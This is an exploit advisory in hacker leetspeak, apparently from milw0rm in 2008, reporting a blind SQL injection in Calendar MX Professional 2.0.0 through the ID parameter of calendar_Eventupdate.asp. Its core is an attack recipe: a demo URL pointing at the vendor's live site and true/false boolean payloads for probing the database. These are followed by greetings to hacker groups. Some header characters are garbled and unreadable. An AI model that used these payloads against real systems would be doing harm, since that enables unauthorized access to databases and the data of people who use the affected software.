Calendar MX Professional 2.0.0 - Blind SQL Injection

[~] ----------------------------�0�1¨�0�1�0�6�0�2… �0�1§�0�2�6�7�0�2�6�7�0�2�6�0 �0�1§�0�2�6�7�0�1±�0�1�0�2�0�2…�0�2�6�9 �0�1§�0�2�6�7�0�1±�0�1�0�2�0�2�0�7�0�2…------------------------------

 [~]Tybe:(calendar_Eventupdate.asp ID) Blind SQL Injection Vulnerability

 [~]Vendor: www.mxmania.net

 [~]Software: Calendar Mx Professional

 [~]author: ((�0�5�0�53d D3v!L))

 [~] Date: 28.11.2008

 [~] Home: www.ahacker.biz

 [~] contact: N/A

[~] --------------------------------{str0ke}---------------------------


 [~]3xpL0!7 4 d3m0:

 http://calendar.mxmania.net/calendar_Eventupdate.asp?ID={bL!ND}


 [~] 8L!/\/D:

  7Ru3 : calendar_Eventupdate.asp?ID=1 and 1=1

  f4L53: calendar_Eventupdate.asp?ID=1 and 1=2


N073:

! 7h!/\/k u can f!nd m0r3

just let your m1nd breath ;)

[[~]----------------------------------------{str0ke}----------------------------------------------


  [~] Greetz tO: {str0ke} & c08RA & black_R0se& maxmos & EV!L KS@ & hesham_hacker &EL z0herY
  [~]
  [~] spechial thanks : dolly & 7am3m & W4L3d ? & {str0ke}
  [~]
  [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
  [~]
  [~] xp10.biz & ahacker.biz
  [~]

[~]-----------------------------------------{str0ke}----------------------------------------------

# milw0rm.com [2008-12-03]